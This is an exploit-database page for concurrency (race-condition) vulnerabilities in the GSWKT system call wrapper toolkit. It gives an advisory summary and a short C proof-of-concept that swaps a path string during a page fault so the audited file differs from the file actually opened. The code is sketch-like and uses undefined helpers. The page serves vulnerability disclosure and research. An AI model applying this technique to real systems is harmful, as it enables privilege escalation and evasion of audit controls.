Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Concurrency Vulnerabilities in GSWKT (Generic Software Wrappers Toolkit) - exploit.company
header-logo
Suggest Exploit
vendor:
GSWKT (Generic Software Wrappers Toolkit)
by:
Unknown
7.5
CVSS
HIGH
Concurrency Vulnerabilities
Unknown
CWE
Product Name: GSWKT (Generic Software Wrappers Toolkit)
Affected Version From: 1.6.2003
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Concurrency Vulnerabilities in GSWKT (Generic Software Wrappers Toolkit)

GSWKT (Generic Software Wrappers Toolkit) is prone to multiple concurrency vulnerabilities because of its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel. Attackers can exploit these issues by replacing certain values in system call wrappers with malicious data to elevate privileges or to bypass auditing. Successful attacks can completely compromise affected computers.

Mitigation:

Unknown
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/25251/info

GSWKT (Generic Software Wrappers Toolkit) is prone to multiple concurrency vulnerabilities because of its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel.

Attackers can exploit these issues by replacing certain values in system call wrappers with malicious data to elevate privileges or to bypass auditing. Successful attacks can completely compromise affected computers.

GSWKT 1.6.3 is vulnerable; other versions may also be affected. 
*/

#define EVIL_NAME ./home/ko/.forward.
#define REAL_NAME ./home/ko/Inbox.
volatile char *path;
/* Set up path string so nul is on different page. */
path = fork_malloc_lastbyte(sizeof(EVIL_NAME));
strcpy(path, EVIL_NAME);
/* Page out the nul so reading it causes a fault. */
pageout_lastbyte(path, sizeof(EVIL_NAME));
/* Create a child to overwrite path on next fault. */
pid = fork_and_overwrite_up(path, REAL_NAME,
sizeof(REAL_NAME));
fd = open(path, O_RDRW);

Navigation

Suggest Exploit

Services By CQR